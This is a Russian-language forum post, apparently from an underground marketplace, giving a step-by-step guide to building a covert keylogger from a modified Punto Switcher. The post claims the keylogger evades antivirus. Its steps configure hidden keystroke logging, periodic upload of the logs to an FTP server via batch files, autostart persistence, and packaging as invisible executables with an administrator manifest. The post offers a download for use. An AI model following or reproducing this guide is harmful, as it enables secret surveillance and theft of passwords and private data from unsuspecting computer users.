- Статус
- Offline
- Регистрация
- 6 Янв 2015
- Сообщения
- 1,180
- Реакции
- 457
- Депозит
- 0р
- Покупки через Гарант
- 0
- Продажи через Гарант
- 2
Данный кейлогер - это измененный Punto Switcher от Яндекса. Главная его особенность это абсолютно чистый код, непалющийся ни одним антивирусом!
Нам понадобится : bat to exe
качаем архивчик,открываем и видим
1.schost.exe.Кликаем по нему 2 раза(с 1ого клика он запуститься скрытно) и снимаем все галочки во всех вкладках: "общие","горячие клавиши","устранение проблем","звуки".В "Дневник" чекаем все галочки кроме автоматического сохранения буфера обмена.Можно поставить пароль,в случае если кто-то перехватит наш дневник.Кликаем принять>ок
2.Открываем Run.bat(см скриншот).У меня кейлогер хранится по адресу :
C:\Windows\system32\Keylogger, вы уже сами думайте куда будете бомбить.Главное не забудьте в Run.bat и других батниках изменить пути на свои.
3.Заходим в папку ftp , открываем SendFile.bat(см скриншот) - это собственно файлик с помощью которого мы будем лить логи на ftp
4.Открываем RunSendFile.bat(см скриншот).Суть этого батника в том,что он будет через 60 мин(3600000мсек) перезапускать SendFile.bat,который и будет заливать логи на ftp.Также в Run.bat мы добавили RunSendFile в автозагрузку.
5.Теперь RunSendFile.bat и SendFile.bat конвертируем в exe с помощью bat to exe.(см скриншот).В том и том батнике выставляем одинаково галочки.
6.А теперь конвертируем Run.bat в exe и внимание перед конвертированием убиваем процесс schost.exe в ДС
1)Чекаем invisible apllication,delete at exit,temporary directory и Add vista administrator manifest
2)В Include жмем add и добавляем все файлы кроме Run.bat.По очереди.т.е сначала userdata.local schost.exe pshook.dll diary.exe diary.dll.Потом открываем папки и добавляем файлы из папок.В virusinformation можно поставить иконку.
3.Нажимаем Comple
Все smile-10
файлик dairy.dat залитый на ваш ftp вы скачиваете и кидаете в User Data,потом кликаем dairy.exe и смотрим логи
особенности:
поскольку кейлогер от Яндекс,то он после 2 перезагрузок копмьютера изменяет настройки,появляется в трее,и добавляет Punto Sweacher в автозагрузку еще раз,поэтому в RunSendFile.bat первая команда- это taskkill /f /im schost.exe > nul
Скачать
